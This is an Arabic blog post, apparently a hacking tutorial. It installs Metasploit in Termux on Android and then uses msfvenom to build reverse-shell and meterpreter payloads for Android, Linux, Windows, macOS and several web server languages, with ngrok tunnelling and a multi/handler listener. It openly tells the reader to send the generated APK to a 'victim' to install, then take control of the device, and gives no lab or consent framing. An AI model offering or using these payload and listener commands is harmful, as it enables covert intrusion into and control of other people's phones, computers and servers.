معلومات عن مشروع
هو مشروع يهتم بالأمن المعلوماتي عبر البحث في الثغرات الأمنية ويساعد في اختبارات الاختراق وتطوير أنظمة كشف التسللات. وأهم إنجازات هذا المشروع هو منصة ميتاسبلوت المفتوحة المصدر وهي أداة تقوم بفتح منفذ في الجهاز المستهدف بهدف اختراقه.
أنشأت ميتاسبلوت من قبل HD Moore سنة 2003، كأداة شبكية محمولة مبرمجة بلغة بيرل. سنة 2007 أعيد برمجتها كليا بواسطة لغة روبي. سنة 2009 أعلن أنه وقع الإستحواذ عليها من قبل Rapid7، وهي شركة أمنية حلول لمعالجة نقاط الضعف في الأنظمة. و كما أنه يمكن استعمال Metasploit للبحث عن ثغرات الأنظمة فإنه يمكن من خلالها اجراء اختراقات غير قانونية/شرعية
اختيار واعداد لعمل الهجمة (باختيار واحدة من بين أكثر من 1577 ثغرة موجودة على مختلف الانظمة من وندوز، ماك أو لينكس
التحقق من أن النظام المستهدف يمكن تطبيق الاختراق عليه
اختيار واعداد البايلود (برمجية ضارة يرسلها المخترق للضحية لفتح قناة تواصل وتشبه في طريقة عملها فيروس حصان طروادة أو فيروس الدودة وعلى سبيل المثال يمكن استغلالها في عمل تحكم عبر بروتوكول VNC)
اختيار طريقة تشفير لتجاوز أنظمة كشف التسللات كتلك الموجودة في مضادات الفيروسات
تنفيذ الهجمة
و هذه الخطوات المتبعة لتنفيذ أي هجوم عبر أي بايلود وعمل الميتاسبلوت هنا هو تسهيل عمل المخترقين. كما نذكر أن الميتاسبلوت يعمل على أغلب أنظمة يونكس (تشمل لينكس والماك) والوندوز وهو متوفر بعدة لغات.
جميع معلومات مأخوذه من ويكيبيديا تستطيع رئيتها هناك ولاكن لو انك لم تعلم تسطيع رئيتها هنا ليكون لك خبره
نبدا بشرح التثبيت
افتح نافذه جديده في termux وقم بضع الاوامر بالترتيب وتأكد بأن الاتصال في الانترنت قوي لكي تتم عمليه بدون أخطاء
pkg update
pkg upgrade
pkg install unstable-repo
pkg install metasploit
هذه الاوامر الاساسيه للتثبيت والاسهل اما عن التشغيل تحتاج امر msfconsole
ستفتح معك الواجه الرسوميه للمشروع
وهناك طرق ثانيه للتثبيت ولاكن انصحك بالطريقه الاساسيه
طريقه ثانيه
Apt update
Apt upgrade –y
Pkg install wget
Pkg install curl
Pkg install openssh
Pkg install git –y
apt install ruby
gem install bundle
gem install bundler
pip install bundle
git clone https://github.com/rapid7/metasploit-framework.git
cd $HOME
ls
cd metasploit-framework
./msfconsole
هنا ايضا حملنا اداه ولاكن بحزمه git طريقه التشغيل تختلف قليلا لاكن للمشكله
ان لم تنجح معك تستطيع تثبيتها عن طريق TOOL-X
1- apt update && apt upgrade -y
2- pkg install git
3- gem install bundle
4- gem install bundler
5- pip install bundle
6- git clone https://github.com/Rajkumrdusad/Tool-X.git
7- cd Tool-X
8- chmod +x install.aex
9- ./install.aex
لاكن اشدد على الطريقه الأولى لانها الافضل وتثبت بدون أخطاء
الان نبدا بتذكره بسيطه مشروع metasploit مشروع اختبار اختراق اغلب الهكرز يقومون بالاختراق عن طريق بايلود والبايلود لو كان مشروع لوحده لكان لا يتعده 2ميجا على مااظن لست متأكد وحجم مشروع metasploit هو 600ميجا هل هذا يعني ان امكانيه المشروع بايلود فقط؟
بالطبع لا ولاكن تحتاج التعمق فيها لكي تعرف طرق الاستغلالات الثانيه
شرع عن اوامر الاداه
يمكنك اعطاء الامر helpليظهر لك الاوامر داخل الاداه ويمكنك ترجمتها على google لكي تستطيع فهمها
الان لنقم بصنع بايلود
لعمل بايلود للاندرويد
msfvenom -p android/meterpreter/reverse_tcp LHOST=### LPORT= $$$ R> /sdcard/elias.apk
طبعا بدال ###حط الهوست اذا كان للاختراق خارجي حطو من نجررك او اذا كنت تيتخدم خدمه ثانيه حطو منها
ومكان $$$حط بورت اذا كان داخلي حط بورت الي فتحته من نجروك واذا كان خارجي حط بورت الي عطاك يا الاداه مع بيكون حد هوست تمام الكلام
بعدها ترسل ملف للضحيه ويثبته وتبدا اختراق
لصنع بايلود للينكس
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
لصنع بايلود يخترق الويندز
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
لصنع بايلود يخترق ماكتنوش
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
لصنع بايلود يخترق سيرفر بلغه php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
صنع بايلود يخترق سيرفر بلغه asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
لصنع بايلود يخترق سيرفر بلغه jsc
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
لصنع بايلود يخترق سيرفر بلغه wer
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
لصنع بايلود بلغه python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
لصنع بايلود بلغه bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
لصنع بايلود بلغه pele
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
هذا انواع بايلودات مختلفه ولكل بايلود له عمله الخاص الان لنفتح الجلسه على ميتاسبلوت بعد ارسال البايلود للضجيه
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST $$$
بدال $$$حط الهوست الي حطيتو في نجررك
set LPORT & & &
بدال & & & حط بورت الي فتحته في نجروك
طبعا ذا لو كان اختراق خارجي
exploit
run
هكذا لقد تم فتح الجلسه تماما بدون مشاكل
للتحكم بجهاز الضحيه ضع الامر helpسوف يساعدك
سيظهر لك اوامر التحكم بجهاز الضحيه.
بعض الاوامر للتسهيل
هنا قد وصلت نهايه المدونه طبعا المدونه متوجه للناس التي معها جبره وليست مبتدأه لذالك لا بأس ان لم تفهم حاول تعلم على termux وستنجح بالتأكيد في فهم الاوامر
تعليقات